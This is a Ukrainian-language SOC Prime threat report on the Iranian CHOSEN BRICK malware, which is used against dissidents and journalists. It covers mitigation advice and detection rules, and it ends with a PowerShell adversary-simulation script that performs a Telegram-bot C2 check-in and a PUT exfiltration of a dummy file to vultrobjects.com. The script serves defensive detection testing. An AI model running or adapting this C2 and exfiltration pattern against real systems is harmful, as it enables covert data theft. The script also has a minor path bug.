SOC Prime Bias: High

17 Sep 2026 08:26 UTC

Іранське кіберпригромування дисидентів, активістів та журналістів

Author Photo
SOC Prime Team linkedin icon Стежити
Іранське кіберпригромування дисидентів, активістів та журналістів
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Іранські актори, які підтримуються державою, використовують шкідливе ПЗ CHOSEN BRICK для націлювання на дисидентів, активістів і журналістів у всьому світі. Шкідливе ПЗ доставляється через соціальну інженерію на таких платформах, як WhatsApp і Telegram, часто маскуючись під легальні програми або файли. Після встановлення CHOSEN BRICK підтримує крадіжку даних, запис з мікрофона та стирання системи через Telegram-управління та контроль.

Розслідування

Розслідування виявило повторювану схему соціальної інженерії, за якою слідує розгортання CHOSEN BRICK на системах Windows. Аналітики спостерігали, як шкідливе ПЗ використовує ботів Telegram для зв’язку C2 і служби зберігання хмарних даних для витоку даних. Стійкість встановлюється через певні ключі запуску в реєстрі, а виключення в Microsoft Defender додаються для уникнення засобів безпеки.

Пом’якшення

Рекомендовані заходи включають покращення обізнаності користувачів про методи соціальної інженерії та уникнення програмного забезпечення, яке надається через небажані вкладення. Організації також повинні запровадити двофакторну аутентифікацію, стійку до фішинг-атак, впровадити белий список застосунків і підтримувати антивірусне програмне забезпечення в актуальному стані. Моніторинг підозрілих з’єднань з Telegram і відомими провайдерами хмарного зберігання може додатково зміцнити виявлення.

Реагування

Якщо виявлено активність CHOSEN BRICK, організації повинні співпрацювати зі своїми ІТ-провайдерами для перегляду журналів кінцевих точок на наявність відповідних ключів реєстру та шляхів до файлів. Повинні бути перевірені як корпоративні, так і особисті пристрої, якими користуються високоризикові особи. Команди безпеки також повинні здійснювати пошук доменів, імен файлів та інших технічних показників, пов’язаних з кампанією.

Потік атаки

Ми ще оновлюємо цю частину.

Виявлення

Можливі точки збереження [ASEPs – Hive програмне забезпечення/NTUSER] (через подію реєстру)

Команда SOC Prime
16 вересня 2026

Можливе використання Telegram як каналу управління та контролю (через dns_query)

Команда SOC Prime
16 вересня 2026

Використання CHOSEN BRICK Telegram та VultrObjects для шкідливих комунікацій [З’єднання з Windows мережею]

SOC Prime AI Правила
16 вересня 2026

Виявлення стійкості CHOSEN BRICK через ключ Run у реєстрі [Подія реєстру Windows]

SOC Prime AI Правила
16 вересня 2026

Виконання симуляції

  • Атака розповідь і команди: Супротивник намагається встановити командування і контроль (C2) та вивести конфіденційні дані. Щоб уникнути традиційного антивірусного підпису, вони використовують легальні веб-сервіси. Спочатку зловмисник виконує команду для “check-in” з сервером C2 через API Telegram (api.telegram.org). Після цього зловмисник симулює вивід конфіденційного файлу, завантажуючи його в сховище на vultrobjects.com. Ці дії виконуються за допомогою стандартних веб-запитів для змішування з легітимним зашифрованим веб-трафіком, сподіваючись уникнути перевірки та бути поміченими лише якщо відомі специфічні IoCs.

  • Скрипт регресійного тестування:

    # Скрипт симуляції: Емуляція TTP CHOSEN BRICK
    # Цей скрипт симулює C2 через Telegram та виведення даних через VultrObjects
    
    $C2_Domain = "api.telegram.org"
    $Exfil_Domain = "vultrobjects.com"
    
    Write-Host "[+] Початок симуляції: Емуляція TTP CHOSEN BRICK..." -ForegroundColor Cyan
    
    # 1. Симуляція C2 Чек-ін (Телеграм API)
    Write-Host "[*] Крок 1: Симуляція чек-іну C2 до $C2_Domain" -ForegroundColor Yellow
    try {
        $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue
        Write-Host "[+] Запит C2 відправлено." -ForegroundColor Green
    } catch {
        Write-Host "[!] Примітка: З'єднання не вдалось (очікувано, якщо немає інтернету/проксі), але телеметрія все одно повинна бути згенерована." -ForegroundColor Gray
    }
    
    # 2. Симуляція виводу даних (VultrObjects)
    Write-Host "[*] Крок 2: Симуляція виводу даних до $Exfil_Domain" -ForegroundColor Yellow
    $dummy_data = "Це конфіденційна інформація, яка виводиться."
    $dummy_file = "$env:TEMPsensitive_data.txt"
    $dummy_data | Out-File -FilePath $dummy_file
    
    try {
        # Симуляція PUT-запиту до кінцевої точки зберігання в хмарі
        Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue
        Write-Host "[+] Запит на виведення відправлено." -ForegroundColor Green
    } catch {
        Write-Host "[!] Примітка: З'єднання не вдалось (очікувано, якщо немає інтернету/проксі), але телеметрія все одно повинна бути згенерована." -ForegroundColor Gray
    }
    
    Write-Host "[+] Симуляція завершена. Перевірте SIEM на наявність проксі-журналів із $C2_Domain та $Exfil_Domain." -ForegroundColor Cyan
  • Команди очистки:

    # Скрипт очистки
    $dummy_file = "$env:TEMPsensitive_data.txt"
    if (Test-Path $dummy_file) {
        Remove-Item -Path $dummy_file -Force
        Write-Host "[+] Очистка: Видалено файл дипломування." -ForegroundColor Green
    } else {
        Write-Host "[!] Очистка: Файл не знайдено." -ForegroundColor Yellow
    }